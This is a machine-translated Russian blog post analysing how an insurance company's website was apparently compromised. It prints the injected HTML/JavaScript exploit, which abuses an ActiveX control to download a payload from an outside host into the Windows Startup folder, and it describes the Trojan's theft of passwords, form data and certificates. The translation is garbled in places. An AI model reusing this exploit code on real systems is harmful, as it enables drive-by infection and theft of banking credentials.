Name: Viral marketing has become viral literally
Item: Viral marketing has become viral literally
Author: Nogianoornals

Main » 2011 » Март » 16 » Viral marketing has become viral literally

13:35 Viral marketing has become viral literally
Two days ago the site alfastrah.ru appeared the so-called "easter egg" - if you click 5-6 times on the phone number in the upper right corner in the header started playing video erotic content. Details details viral stocks described here. It's no secret that viral marketing is aimed at a very rapid expansion - come to the site have grown exponentially. On some forums there were warnings that when approaching the site Kaspersky swears and says that the site sits a Trojan. In a conversation with the staff of Kaspersky Lab, this information is confirmed. Thus, "viral marketing" literally turned viral. Here is some expert commentary. Site analysis revealed that, in addition to erotic cartoon, sitting there and the virus. Site analysis revealed that, in addition to erotic cartoon, sitting there and the virus. An interesting way of introduction: it is inserted gently into the center of the page. Ship that's what (the script is not even encrypted): google-analyze.com/counter/index.php. HTTP/1.1 200 OK Date: Tue, 25 Nov 2008 15:43 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP / 5.1.6 Vary: Accept-Encoding, User-Agent Content-Length: 475 Connection: close Content-Type: text / html <object classid = «clsid: F0E42D50-368C-11D0-AD81-00A0C90DC8D9» id = «attack»> </ object> <script> var arbitrary_file = «google-analyze.com/tracker / load.php »; var destination = 'c: / Documents and Settings / All Users / Start Menu / Programs / StartUp / browsser.exe'; attack.SnapshotPath = arbitrary_file; attack.CompressedPath = destination; attack.PrintSnapshot (arbitrary_file, destination); </ script> <embed src = «pdf.php» type = «application / pdf» width = 100 height = 100> </ embed> The virus has a feature - blocking downloads when you visit - the virus gets on the PC only at first boot with some aypishnika, repeated anymore. So if you look out of the office, which go through a proxy - will suffer, only the first peeking. To introduce the site was used Unclosed vulnerability. The Beast one-in-one repeats the PoC, published here: http://www.xakep.ru/post/44605/Microsoft-Access-Snapshot-Viewer-ActiveX-Control-Exploit.txt B functional boat, in addition to the standard procedures for installing itself into the system, introduction of running processes, the fight with some antivirus products, services anonymous socks-and http proxy server includes powerful procedure information theft: The Trojan steals content, Protected Storage, in which contains user passwords. Formgrabber. The Trojan intercepts all sent browser data entered into the form. Controlled addresses from which the intercepted information - it usually addresses of banks and payment systems. Thus there stealing accounts. Bypass the virtual keyboard. Trojan intercepts mouse clicks and makes screenshots at this point. Spoofing Web sites and pages. This is a very interesting way, it was previously used in the Nuclear Grabber. When a user tries to enter one of the sites that are accessed is controlled by the Trojan, is a redirect request to a fake phishing site, or adding to the original page of the site of the new fields for data entry. Page content is substituted directly on the user's computer before displaying in the browser! Stealing certificates. Despite the treatment of Alpha-insurance from the LC and others (myself, for example, he wrote 2 letters), the vulnerability is still not resolved, but the site hangs Trojans - already seems to be new. I want to thank the staff of Kaspersky Lab for efficiency and technical comments.
1 2 3 4 5 Views: 606 \| Added by: w1zard \| Rating: 0.0/0

Total comments: 1

Порядок вывода комментариев:

1 Nogianoornals (21.09.2012 15:12)

Hello!
Curabitur molestie tempus ligula et facilisis quam fringilla quis. Aliquam scelerisque erat quis dolor volutpat rhoncus.


Имя *:
Email *:

Код *: